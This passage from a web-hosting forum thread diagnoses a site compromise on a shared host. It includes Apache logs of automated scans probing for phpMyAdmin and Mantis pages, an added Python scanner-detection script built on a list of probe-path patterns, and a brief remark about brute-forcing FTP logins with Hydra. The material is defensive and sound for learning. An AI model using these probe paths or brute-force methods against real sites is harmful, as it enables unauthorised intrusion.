67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /phpadmin/scripts/setup.php HTTP/1.0" 404 224 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 226 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:32 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 226 "-" "-"
67.228.16.196 - - [01/Nov/2009:01:57:32 +0000] "GET /mantisbt/signup_page.php HTTP/1.1" 404 192 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:32 +0000] "GET /tracker/signup_page.php HTTP/1.1" 404 192 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /bugtracker/signup_page.php HTTP/1.1" 404 194 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /bugtrack/signup_page.php HTTP/1.1" 404 193 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /support/signup_page.php HTTP/1.1" 404 191 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /bug/signup_page.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /bugs/signup_page.php HTTP/1.1" 404 190 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /mantis/signup_page.php HTTP/1.1" 404 191 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /signup_page.php HTTP/1.1" 404 187 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /php/mantis/signup_page.php HTTP/1.1" 404 193 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /turbo/mantis/signup_page.php HTTP/1.1" 404 195 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /blog/register.php HTTP/1.1" 404 186 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /eblog/register.php HTTP/1.1" 404 186 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /lightblog/register.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /LightBlog/register.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:30 +0000] "GET /sql/ HTTP/1.1" 404 177 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:30 +0000] "GET /mysql/ HTTP/1.1" 404 179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:15 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:15 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:16 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:17 +0000] "GET /sql/ HTTP/1.1" 404 177 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:18 +0000] "GET /mysql/ HTTP/1.1" 404 179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
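As an added example that is not part of the thread (mine, not any poster's): the Python below does the log sweep described above. It parses Apache combined-format lines, groups 404s by client IP and reports any IP that either requested a known scanner probe path (phpMyAdmin's setup.php, Mantis signup_page.php, blog register.php, as in the excerpt) or produced several distinct 404s within a minute. Seven of the embedded lines are copied from the excerpt above; the two from 198.51.100.23 are constructed to show an ordinary visitor's stray favicon 404 not being flagged. The probe-path list and thresholds are assumptions to tune for your own site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format, as in the lines quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Paths only a scanner asks for when you do not run the application in question.
PROBE_PATHS = (
    re.compile(r'/scripts/setup\.php$'),                                 # phpMyAdmin setup script
    re.compile(r'/(?:phpmyadmin|myadmin|phpadmin|sql|mysql)/', re.I),    # admin front ends
    re.compile(r'/signup_page\.php$'),                                   # Mantis bug tracker
    re.compile(r'/register\.php$'),                                      # LightBlog and friends
)

# Seven lines from the excerpt above plus two constructed lines for a normal visitor.
SAMPLE_LOG = """\
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /myAdmin//scripts/setup.php HTTP/1.0" 404 224 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 226 "-" "-"
67.228.16.196 - - [01/Nov/2009:01:57:32 +0000] "GET /mantisbt/signup_page.php HTTP/1.1" 404 192 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /blog/register.php HTTP/1.1" 404 186 "-" "Toata dragostea mea pentru diavola"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:30 +0000] "GET /mysql/ HTTP/1.1" 404 179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.23 - - [01/Nov/2009:09:12:05 +0000] "GET /favicon.ico HTTP/1.1" 404 180 "http://www.example.invalid/" "Mozilla/5.0 (constructed ordinary visitor)"
198.51.100.23 - - [01/Nov/2009:09:12:06 +0000] "GET /index.html HTTP/1.1" 200 7664 "-" "Mozilla/5.0 (constructed ordinary visitor)"
"""

def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d['status'] = int(d['status'])
    d['ts'] = datetime.strptime(d['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return d

def is_probe(path):
    return any(p.search(path) for p in PROBE_PATHS)

def find_scanners(lines, min_404=3, window_seconds=60):
    """Report client IPs that hit any known probe path, or at least min_404 distinct missing
    paths within window_seconds. Returns {ip: {'count', 'probe_paths', 'user_agents'}}."""
    by_ip = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e and e['status'] == 404:
            by_ip[e['ip']].append(e)
    report = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e['ts'])
        probes = sorted({e['path'] for e in events if is_probe(e['path'])})
        burst = False
        for i, first in enumerate(events):
            window = [e for e in events[i:]
                      if (e['ts'] - first['ts']).total_seconds() <= window_seconds]
            if len({e['path'] for e in window}) >= min_404:
                burst = True
                break
        if burst or probes:
            report[ip] = {'count': len(events), 'probe_paths': probes,
                          'user_agents': sorted({e['ua'] for e in events})}
    return report

if __name__ == '__main__':
    for ip, info in sorted(find_scanners(SAMPLE_LOG.splitlines()).items()):
        print(ip, info['count'], '404s', 'probes:', info['probe_paths'], 'UA:', info['user_agents'])
```

Point it at the rotated access logs (`find_scanners(open(path))` works line by line) and then look at the same IPs for the requests that did not return 404: a scanner that found something you do have is the one that matters.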
oracleguy
01-11-2010, 05:53 PM
Thing is Phil, they got in there somehow - and they will be back if you don't find where they got in.
It can only really come down to weak ftp user/pass {it's pretty trivial to run something like Hydra against an ftp server}
Exploit on the code/scripts
Exploit on a neighbour.
Or an exploit on a service running on the server, such as the ftp server or Apache.
Also remember that FTP is not a secure protocol, it sends your username and password in the clear over the net. And as such it is good practice to change your password every once in a while. Also consider any password you use as one you shouldn't use for anything else.
Phil Jackson
01-11-2010, 06:48 PM
It's on a Heart Internet reseller account; the passwords are something like 'ZCdl4b19nnP'. My logs only go back so far and that date (26th December) has been cleaned.
Without trawling the logs it's pretty much impossible to say where the breach occurred and whilst I agree there could be an exploit on the server in general, it does not appear to be affecting other customers on the host. Given the nature of the malicious script, The Newbury Radio Station site on the shared host would have been a much more fruitful tree to climb. For this reason I suspect that it is probably isolated to Phil having some low hanging fruit in there somewhere.
But sure, it *could* be a hole in Apache or any number of services on the box, but I'd personally put that down the list until I ruled all the 'I did this' kind of possibles out.
Just one other thing - I appreciate this is *old*:
http://www.theregister.co.uk/2008/06/24/heart_internet_password_gaffe/
but have you been with them long?
oracleguy
01-11-2010, 07:12 PM
Without trawling the logs it's pretty much impossible to say where the breach occurred and whilst I agree there could be an exploit on the server in general, it does not appear to be affecting other customers on the host. Given the nature of the malicious script, The Newbury Radio Station site on the shared host would have been a much more fruitful tree to climb. For this reason I suspect that it is probably isolated to Phil having some low hanging fruit in there somewhere.
But sure, it *could* be a hole in Apache or any number of services on the box, but I'd personally put that down the list until I ruled all the 'I did this' kind of possibles out.
Agreed, looks like just a hack of opportunity.
Phil, you should see if you can get the older log files; they may just use logrotate and archive them off after a certain period of time but still be able to email them to you.
dmgroom
02-03-2010, 12:01 PM
Just out of interest, which server at Heart Internet was the site on?
I've just found a similar piece of code on one of my sites hosted at Heart Internet.
The code was in the index.html file, and according to the file manager this file was last changed at 1:10 on 25 Dec 2009, a date and time I was most certainly not updating web pages.
I seem to recall it was: 79.170.44.113
vBulletin® v3.8.2, Copyright ©2000-2012, Jelsoft Enterprises Ltd.